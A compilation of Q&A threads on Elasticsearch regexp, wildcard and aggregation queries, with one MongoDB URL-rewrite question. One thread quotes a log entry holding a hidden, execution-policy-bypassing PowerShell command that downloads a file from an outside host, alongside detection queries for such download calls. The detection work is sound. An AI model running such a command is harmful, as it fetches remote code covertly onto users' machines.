How to search "\....\" using regexp in elasticsearch - regex

In my indexed data, I am having some documents which are having values like this -
"exclude y:\dkj....\sdfisd\sdfsdf\asdfai"
My requirement is to search all the documents having such entries based on "\....\". So for this I am using "regexp".
Currently I have used below regular expression for this, but it didn't worked out for me -
".*\\(\.\.\.\.)\\.*"
".*?[\.]{4}.*"
".*\\[\.]{4}\\.*"
Below is the part of my query which I am firing to elasticsearch.
"bool" : {
"must" : [ {
"query_string" : {
"query" : "\"DC2\"",
"default_field" : "COLLECTOR_NAME"
}
}, {
"regexp" : {
"RAW_EVENT_DATA" : {
"value" : ".*?[\\.]{4}.*",
"flags_value" : 0
}
}
} ]
}
Please provide some suggestions.

Usually it is related to analyzer
Let us create type with following mapping
{
"my_index": {
"mappings": {
"test": {
"properties": {
"title": {
"type": "string"
},
"title_raw": {
"type": "string",
"index": "not_analyzed"
}
}
}
}
}
}
Add new document
POST my_index/test/1
{
"title":"exclude y:\\dkj....\\sdfisd\\sdfsdf\\asdfai",
"title_raw":"exclude y:\\dkj....\\sdfisd\\sdfsdf\\asdfai"
}
Now search it
POST my_index/test/_search
{
"query": {
"regexp" : {
"title" : {
"value" : ".*?[\\.]{4}.*",
"flags_value" : 0
}
}
}
returns empty result
But not analysed field works perfect with regexp
POST my_index/test/_search
{
"query": {
"regexp" : {
"title_raw" : {
"value" : ".*?[\\.]{4}.*",
"flags_value" : 0
}
}
}
You can check documentation to get an idea why it is happening. Because you are using standard analyzer part of information is lost on indexing stage and not available during search.

Related

AWS ElasticSearch Query for Keyword not getting results I expect

I have an ElasticSearch query that looks like:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"Message.keyword": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"Message.keyword": "*system.net.webclient).downloadfile(*"
}
}
]
}
}
}
}
}
And a Doc in my Index that includes:
message:Engine state is changed from None to Available. Details: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.18362.628 HostId=3dd1a50a-cc15-45e0-bf63-4456d556fb67 HostApplication=powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download EngineVersion=5.1.18362.628 RunspaceId=de762b62-056c-4be1-90bf-a12cfe6fbc72
As you can see above it includes:
(New-Object System.Net.WebClient).DownloadFile('https:....
It seems like the filter here should be matching the message, but when I execute the Query through Kibana, nothing matches even though I can see the doc above inside my index through Kibana UI if I just query for *.
I think maybe this is because the query above is querying for Message.keyword? How do I get it to successfully hit the document above?
Edit:
mapping: https://pastebin.com/cWN4jF3d
Sample data: https://pastebin.com/SyErqaG8
There are two reasons for the query not returning the result:
The field name in mapping is message whereas in query you are using Message.
A field with keyword datatype index the data as it is. This means it will be case sensitive as well. The document you shared has text System.Net.WebClient).DownloadFile( where you can see that there are characters with upper case whereas the search query you expect to match "*system.net.webclient).downloadfile(*" has all lower case characters.
Therefore the query should be:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"message.keyword": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"message.keyword": "*System.Net.WebClient).DownloadFile(*"
}
}
]
}
}
}
}
}
The keyword fields are used only for exact match. You will need to match the regular fields if you only want to match a substring / subset of the string, by querying on Message instead of Message.keyword:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"Message": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"Message": "*system.net.webclient).downloadfile(*"
}
}
]
}
}
}
}
}

How can i replace little part of profilepic url path in all documents by running single query in mongodb

{
"_id" : ObjectId("5bd6ed6a49ba281f5c54f185"),
"AvatarSet" : {
"Avatar" : [
{
"IsPrimaryAvatar" : true,
"ProfilePictureUrl" : "https://blob.blob.core.windows.net/avatarcontainer/avatardba36759-3e8e-4666-bc2b-e53ffb527716.jpeg?version=8b1b58b3-94f8-4608-b4db-05746eea8bfe"
}
]
}
Here I need to Replace only https://blob.blob.core.windows.net to every candidateID present in the database please help me how to write MongoDB Query for this?
I'm using Query but it's not working
db.getCollection("candidate-staging")
.find({},{"AvatarSet":[0]})..forEach(function(e) {
e.ProfilePictureUrl= e.ProfilePictureUrl.replace("https://blob.blob.core.windows.net", "https://blob123.blob.core.windows.net");
db.candidate-staging.save(e);
});
The problem in your script is that the ProfilePictureUrl is not properly referred, using dot notation like in the example below should solve the problem.
In your code e.ProfilePictureUrl points to a missing field in the top level document, while doc.AvatarSet.Avatar[0].ProfilePictureUrl in the following example points to the ProfilePictureUrl field for the first element in the Avatar array under the AvatarSet field from the main document.
db.test.find({}).forEach(function(doc) {
doc.AvatarSet.Avatar[0].ProfilePictureUrl= doc.AvatarSet.Avatar[0].ProfilePictureUrl.replace("https://blob.blob.core.windows.net", "https://blob123.blob.core.windows.net");
db.test.save(doc);
});
Local test:
mongos> db.test.find()
{ "_id" : ObjectId("5bdb5e3c553c271478a9a006"), "AvatarSet" : { "Avatar" : [ { "IsPrimaryAvatar" : true, "ProfilePictureUrl" : "https://blob.blob.core.windows.net/avatarcontainer/avatardba36759-3e8e-4666-bc2b-e53ffb527716.jpeg?version=8b1b58b3-94f8-4608-b4db-05746eea8bfe" } ] } }
{ "_id" : ObjectId("5bdb5e3e553c271478a9a007"), "AvatarSet" : { "Avatar" : [ { "IsPrimaryAvatar" : true, "ProfilePictureUrl" : "https://blob.blob.core.windows.net/avatarcontainer/avatardba36759-3e8e-4666-bc2b-e53ffb527716.jpeg?version=8b1b58b3-94f8-4608-b4db-05746eea8bfe" } ] } }
mongos> db.test.find({}).forEach(function(doc) {
doc.AvatarSet.Avatar[0].ProfilePictureUrl= doc.AvatarSet.Avatar[0].ProfilePictureUrl.replace("https://blob.blob.core.windows.net", "https://blob123.blob.core.windows.net");
db.test.save(doc); });
mongos> db.test.find()
{ "_id" : ObjectId("5bdb5e3c553c271478a9a006"), "AvatarSet" : { "Avatar" : [ { "IsPrimaryAvatar" : true, "ProfilePictureUrl" : "https://blob123.blob.core.windows.net/avatarcontainer/avatardba36759-3e8e-4666-bc2b-e53ffb527716.jpeg?version=8b1b58b3-94f8-4608-b4db-05746eea8bfe" } ] } }
{ "_id" : ObjectId("5bdb5e3e553c271478a9a007"), "AvatarSet" : { "Avatar" : [ { "IsPrimaryAvatar" : true, "ProfilePictureUrl" : "https://blob123.blob.core.windows.net/avatarcontainer/avatardba36759-3e8e-4666-bc2b-e53ffb527716.jpeg?version=8b1b58b3-94f8-4608-b4db-05746eea8bfe" } ] } }
In this code contains objects of an array of the object In this code reach AvatarSetArray points to a missing field in the top-level document because we need to access objects within the Another Array so we need to write another loop for 'Avatar' Array like e.AvatarSet.Avatar.forEach its really works. it's work for me.
db.getCollection("test").find({}).forEach(function(e,i) {
e.AvatarSet.Avatar.forEach(function(url, j) {
url.ProfilePictureUrl = url.ProfilePictureUrl.replace("https://blob.blob.core.windows.net", "https://blob123.blob.core.windows.net");
e.AvatarSet.Avatar[j] = url;
});
db.getCollection("test").save(e);
eval(printjson(e));
})
thanks!! manfonton and stackoverflow

Elasticsearch regexp query finds no results

I've a problem to build the correct query. I have an index with a field "ids" with the following mapping:
"ids" : {
"type" : "text",
"fields" : {
"keyword" : {
"type" : "keyword",
"ignore_above" : 256
}
}
}
A sample content could look like this:
10,20,30
It's a list of ids. Now I want to make a query with multiple possible ids and I want to make a disjunction (OR) so I decided to use a regexp:
{
"query" : {
"bool" : {
"must" : [
{
"query_string" : {
"query" : "Test"
}
},
{
"regexp" : {
"ids" : {
"value" : "10031|20|10038",
"boost" : 1
}
}
}
]
}
},
"size" : 10,
"from" : 0
}
The query is executed successfully but with no results. I expected to find 3 results.
If you want to get 10031 or 20 or 10038, you need to add parenthesis.
Change "10031|20|10038" => "(10031|20|10038)"

Elasticsearch escape "¬" character in regex

I am stuck with this symbol "¬" when trying to run a elasticsearch regex query
to return from set of record in format "prefix-content¬value".
Example (not limited to website pattern, can be any value) : "website-website descriptions that not required¬www.google.com" .
{
"query": {
"filtered": {
"query": {
"match_all": {}
},
"filter": {
"regexp": {
"information": "(website?)(.*¬)(www.google.com?)"
}
}
}
}
}
Has anyone encounter such problem before and manage to handle this ? Thanks.

Elasticsearch aggregations over regex matching in a list

My documents in elasticsearch are of the form
{
...
dimensions : list[string]
...
}
I'd like to find all dimensions over all the documents that match a regex. I feel like an aggregation would probably do the trick, but I'm having trouble formulating it.
For example, suppose I have three documents as below:
{
...
dimensions : ["alternative", "alto", "hello"]
...
}
{
...
dimensions : ["hello", "altar"]
...
}
{
...
dimensions : ["nore", "sore"]
...
}
I'd like to get the result ["alternative", "alto", "altar"] when I'm querying for the regex "alt.*"
You can achieve that with a simple terms aggregation parametrized with an include property which you can use to specify either a regexp (e.g. alt.* in your case) or an array of values to be included in the buckets. Note that there is also the exclude counterpart, if needed:
{
"size": 0,
"aggs": {
"dims": {
"terms": {
"field": "dimensions",
"include": "alt.*"
}
}
}
}
Results:
{
...
"aggregations" : {
"dims" : {
"doc_count_error_upper_bound" : 0,
"sum_other_doc_count" : 0,
"buckets" : [ {
"key" : "altar",
"doc_count" : 1
}, {
"key" : "alternative",
"doc_count" : 1
}, {
"key" : "alto",
"doc_count" : 1
} ]
}
}
}